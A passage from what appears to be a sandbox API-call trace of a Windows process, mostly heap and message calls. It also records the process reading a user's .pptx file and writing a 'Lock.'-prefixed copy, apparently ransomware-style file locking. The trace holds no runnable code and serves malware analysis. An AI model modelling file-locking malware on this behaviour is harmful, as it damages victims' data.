hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0206.070] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0206.070] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0206.070] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0206.070] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0206.071] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0206.071] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0206.071] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0206.071] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0206.071] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0206.071] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0206.071] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0206.071] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0206.071] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0206.071] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0206.071] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0206.071] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d00 | out: hHeap=0x25c0000) returned 1 [0206.071] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f00 | out: hHeap=0x25c0000) returned 1 [0206.071] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0206.071] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f1d0 | out: hHeap=0x25c0000) returned 1 [0206.071] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0206.071] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0206.071] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0206.071] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0206.072] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0206.072] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0206.072] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6af8 | out: hHeap=0x25c0000) returned 1 [0206.072] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0206.072] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0206.072] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0206.072] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b98 | out: hHeap=0x25c0000) returned 1 [0206.072] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0206.072] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0206.072] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0206.072] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0206.072] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0206.072] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0206.072] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0206.072] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0206.072] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416490 | out: hHeap=0x25c0000) returned 1 [0206.072] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0206.072] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ab0 | out: hHeap=0x25c0000) returned 1 [0206.072] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0206.072] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0206.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0206.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0206.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0206.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0206.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0206.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0206.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0206.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0206.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa218 | out: hHeap=0x25c0000) returned 1 [0206.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0206.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0206.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0206.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0206.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0206.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0206.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0206.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0206.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0206.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0206.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0206.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0206.074] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0206.074] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0206.074] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0206.074] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0206.074] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0206.074] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0206.074] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0206.074] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0206.074] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0206.074] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0206.074] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Roaming/OjU _gfFJ vK4z9.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\oju _gffj vk4z9.pptx"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f8 [0206.075] SetFilePointerEx (in: hFile=0x1f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0206.075] SetFilePointerEx (in: hFile=0x1f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf2c8 | out: lpNewFilePointer=0x0) returned 1 [0206.075] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466dd0 [0206.075] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0206.075] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0206.075] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0206.075] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0206.075] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0206.075] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0206.075] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0206.075] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0206.075] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0206.075] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Roaming/Lock.OjU _gfFJ vK4z9.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\lock.oju _gffj vk4z9.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x268 [0206.076] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e10 [0206.076] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0206.076] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0206.076] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0206.076] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0206.076] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0206.076] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0206.076] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0206.076] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0206.076] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0206.076] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0206.077] SetFilePointerEx (in: hFile=0x1f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf4ec | out: lpNewFilePointer=0x0) returned 1 [0206.077] ReadFile (in: hFile=0x1f8, lpBuffer=0x24b7a48, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x24b7a48*, lpNumberOfBytesRead=0x8bf500*=0x10000, lpOverlapped=0x0) returned 1 [0206.079] ReadFile (in: hFile=0x1f8, lpBuffer=0x24b7a48, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x24b7a48*, lpNumberOfBytesRead=0x8bf500*=0x6b6c, lpOverlapped=0x0) returned 1 [0206.079] ReadFile (in: hFile=0x1f8, lpBuffer=0x24b7a48, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x24b7a48*, lpNumberOfBytesRead=0x8bf500*=0x0, lpOverlapped=0x0) returned 1 [0206.081] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0206.081] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0206.081] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0206.081] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ff0 [0206.081] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0206.081] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0206.081] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x16b6c) returned 0x24d7a58 [0206.082] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0206.082] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0206.082] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0206.082] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0206.082] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0206.082] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0206.082] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c18 [0206.082] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0206.082] CharUpperBuffW (in: lpsz="A6000504F44", cchLength=0xb | out: lpsz="A6000504F44") returned 0xb [0206.082] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0206.082] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0206.082] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0206.082] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2da8 [0206.082] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ff0 [0206.082] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0206.082] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0206.082] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0206.082] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x16b6c) returned 0x24d7a58 [0206.082] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0206.082] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1c08 [0206.083] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0206.083] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0206.083] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0206.083] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b18b8 [0206.083] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0206.083] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0206.083] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0206.083] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1698 [0206.083] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0206.083] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0206.083] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0206.083] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9db0 [0206.083] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c18 [0206.083] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0206.083] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0206.083] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0206.083] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0206.083] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0206.083] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0206.083] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x16b6c) returned 0x34c8dc8 [0206.085] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0206.085] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0206.085] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17d8 [0206.085] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0206.085] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a80 [0206.085] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0206.085] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0206.085] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0206.085] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0206.085] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0206.085] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0206.085] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0206.085] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0206.085] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0206.085] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0206.085] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0206.085] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0206.085] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0206.085] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0206.086] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.086] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0206.086] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0206.086] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0206.086] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa218 [0206.086] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0206.086] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0206.086] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0206.086] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0206.086] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0206.086] CharUpperBuffW (in: lpsz="SSA6000504F44", cchLength=0xd | out: lpsz="SSA6000504F44") returned 0xd [0206.086] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0206.086] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0206.086] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0206.086] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa218 | out: hHeap=0x25c0000) returned 1 [0206.086] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0206.086] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0206.086] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0206.086] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0206.087] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.087] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0206.087] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.087] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0206.087] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1848 [0206.087] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0206.087] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0206.087] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0206.087] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa218 [0206.087] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0206.087] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ab0 [0206.087] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0206.087] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0206.087] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0206.087] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b98 [0206.087] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0206.087] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0206.087] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0206.088] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0206.088] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0206.088] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.088] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0206.088] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1848 [0206.088] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0206.088] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0206.088] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0206.088] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0206.088] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17f8 [0206.088] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0206.088] 